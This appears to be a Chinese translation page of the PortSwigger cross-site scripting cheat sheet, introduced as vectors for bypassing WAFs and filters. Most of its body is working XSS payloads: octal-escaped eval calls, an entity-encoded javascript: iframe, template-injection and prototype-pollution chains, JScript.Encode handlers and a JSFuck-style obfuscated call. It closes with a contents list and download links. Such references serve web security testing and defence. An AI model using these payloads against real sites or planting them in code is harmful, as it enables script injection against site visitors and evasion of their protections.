2020跨站脚本[xss]速查表 xss cheat sheet

2020跨站脚本[xss]速查表 xss cheat sheet

此跨站脚本(XSS)备忘单包含许多向量,可以帮助您绕过WAF和过滤器。您可以通过事件,标签或浏览器选择向量,每个向量都包含概念证明。
该备忘单会在2020年进行定期更新。
最近更新:2020年6月4日,星期四08:57:33 +0000。

<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>

<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>

{{constructor.constructor('alert(1)')()}}

{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()

';top['\141\154\145\162\164']('\130\123\123');//

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//

中文翻译地址:

https://www.ddosi.com/bpxss.html
[水平有限,翻译不周之处请转到原文查看]

2020跨站脚本[xss]速查表 xss cheat sheet

目录

事件处理程序
   	没有用户互动
   	需要用户互动
限制字元
构架
通讯协定
其他有用的属性
特殊标签
编码方式
混淆
客户端模板注入
   	VueJS反映
   	AngularJS沙箱逃逸反映
   	AngularJS沙箱转义DOM
   	AngularJS CSP绕过
无脚本攻击
多重发光
WAF绕过全局对象
不可能的实验室
经典向量(XSS加密)
2020跨站脚本[xss]速查表 xss cheat sheet

2020跨站脚本[xss]速查表下载地址[pdf]

burpsuite官方 : cheat-sheet.pdf
GitHub : https://github.com/ddosi/hack
雨苁网盘: https://w.ddosi.workers.dev/

原文地址:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet